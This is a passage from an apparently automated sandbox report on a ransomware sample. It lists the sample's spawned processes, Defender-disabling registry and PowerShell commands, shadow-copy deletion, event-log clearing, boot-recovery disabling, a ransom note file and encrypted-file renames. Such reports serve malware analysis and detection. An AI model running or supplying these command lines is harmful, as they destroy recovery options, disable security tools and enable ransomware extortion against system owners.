PID 1400 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
PID 1400 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/2036-54-0x0000000000000000-mapping.dmp

memory/1160-55-0x0000000000000000-mapping.dmp

memory/696-56-0x0000000000000000-mapping.dmp

memory/1224-57-0x0000000000000000-mapping.dmp

memory/1252-58-0x0000000000000000-mapping.dmp

memory/764-59-0x0000000000000000-mapping.dmp

memory/816-60-0x0000000000000000-mapping.dmp

memory/1544-61-0x0000000000000000-mapping.dmp

memory/1952-62-0x0000000000000000-mapping.dmp

memory/740-63-0x0000000000000000-mapping.dmp

memory/956-64-0x0000000000000000-mapping.dmp

memory/960-65-0x0000000000000000-mapping.dmp

memory/1404-66-0x0000000000000000-mapping.dmp

memory/1560-67-0x0000000000000000-mapping.dmp

memory/1804-68-0x0000000000000000-mapping.dmp

memory/1168-69-0x0000000000000000-mapping.dmp

memory/992-70-0x0000000000000000-mapping.dmp

memory/952-71-0x0000000000000000-mapping.dmp

memory/1776-72-0x0000000000000000-mapping.dmp

memory/1956-73-0x0000000000000000-mapping.dmp

memory/1704-74-0x0000000000000000-mapping.dmp

memory/1352-75-0x0000000000000000-mapping.dmp

memory/1192-76-0x0000000000000000-mapping.dmp

memory/916-77-0x0000000000000000-mapping.dmp

memory/1732-78-0x0000000000000000-mapping.dmp

memory/1584-79-0x0000000000000000-mapping.dmp

memory/532-80-0x0000000000000000-mapping.dmp

memory/1160-81-0x0000000000000000-mapping.dmp

memory/1372-82-0x0000000000000000-mapping.dmp

memory/1832-83-0x0000000000000000-mapping.dmp

memory/1100-84-0x0000000000000000-mapping.dmp

memory/1460-85-0x0000000000000000-mapping.dmp

memory/736-86-0x0000000000000000-mapping.dmp

memory/1040-87-0x0000000000000000-mapping.dmp

memory/1836-88-0x0000000000000000-mapping.dmp

memory/1104-89-0x0000000000000000-mapping.dmp

memory/1624-90-0x0000000000000000-mapping.dmp

memory/1772-91-0x0000000000000000-mapping.dmp

memory/1920-92-0x0000000000000000-mapping.dmp

memory/1380-93-0x0000000000000000-mapping.dmp

memory/1900-94-0x0000000000000000-mapping.dmp

memory/892-95-0x0000000000000000-mapping.dmp

memory/1604-96-0x0000000000000000-mapping.dmp

memory/1384-97-0x0000000000000000-mapping.dmp

memory/1652-98-0x0000000000000000-mapping.dmp

memory/680-99-0x0000000000000000-mapping.dmp

memory/728-100-0x0000000000000000-mapping.dmp

memory/1588-101-0x0000000000000000-mapping.dmp

memory/2044-102-0x0000000000000000-mapping.dmp

memory/1284-103-0x0000000000000000-mapping.dmp

memory/2000-104-0x0000000000000000-mapping.dmp

memory/776-105-0x0000000000000000-mapping.dmp

memory/1312-106-0x0000000000000000-mapping.dmp

memory/1716-107-0x0000000000000000-mapping.dmp

memory/1608-108-0x0000000000000000-mapping.dmp

memory/520-109-0x0000000000000000-mapping.dmp

memory/1572-110-0x0000000000000000-mapping.dmp

memory/1324-111-0x0000000000000000-mapping.dmp

memory/1708-112-0x0000000000000000-mapping.dmp

memory/1708-113-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

memory/884-114-0x0000000000000000-mapping.dmp

memory/1612-116-0x0000000000000000-mapping.dmp

memory/1476-118-0x0000000000000000-mapping.dmp

memory/972-119-0x0000000000000000-mapping.dmp

memory/660-120-0x0000000000000000-mapping.dmp

memory/1156-123-0x00000000025D0000-0x00000000025D2000-memory.dmp

memory/1156-124-0x00000000025D2000-0x00000000025D4000-memory.dmp

memory/1156-125-0x00000000025D4000-0x00000000025D7000-memory.dmp

memory/1156-122-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

memory/1156-126-0x00000000025DB000-0x00000000025FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0b3d25fb685158a43d4a56861a448756
SHA1 1eb3e477363f853566f5086128a369f25862aa3a
SHA256 23b030291621f64706be3337f51b643ce70b8f7b3adeb39e9850d6449510f303
SHA512 d3abc5607676f125fed3d0b4325606c32afed05196af2064734245736e065e966493f307e25e4f6be7fcc1684423e12f4864ef32dcdbcc442aaba357dcbdb670

memory/1064-129-0x000007FEF2AB0000-0x000007FEF360D000-memory.dmp

memory/1064-131-0x00000000026A0000-0x00000000026A2000-memory.dmp

memory/1064-132-0x00000000026A2000-0x00000000026A4000-memory.dmp

memory/1064-133-0x00000000026A4000-0x00000000026A7000-memory.dmp

memory/1064-130-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/1064-134-0x00000000026AB000-0x00000000026CA000-memory.dmp

C:\vyS2_HOW_TO_DECRYPT.txt

MD5 ee121b1deb962e44600cf271791ebd82
SHA1 1c5b22c8856b15843ac236159b558e1fdca8dc04
SHA256 34ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512 f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:51

Reported

2022-01-12 16:56

Platform

win10-en-20211208

Max time kernel

119s

Max time network

209s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandReceive.raw => C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRegister.crw => C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87__wC6eB5YWEE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-16_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Spider\ResPacks\gameplayspider.respack C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.winmd C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_dcgBmfxmWl00.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_C8hEF4maxwY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\FileSystemMetadata.xml.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JdLAFUBxR6A0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_o6Id7afySdo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YrL2geyrNdQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-high.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_ed4FFgOCwYU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Apply.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_7BdU5xsWnHE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache-Dark.scale-180.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Square310x310\PaintLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-US.PhoneNumber.SMS.ot C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Offihub_Base_PriInfo.pri.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-64.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_vGlQbTDe_eA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_9e4IhdhiV-A0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSplashScreen.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
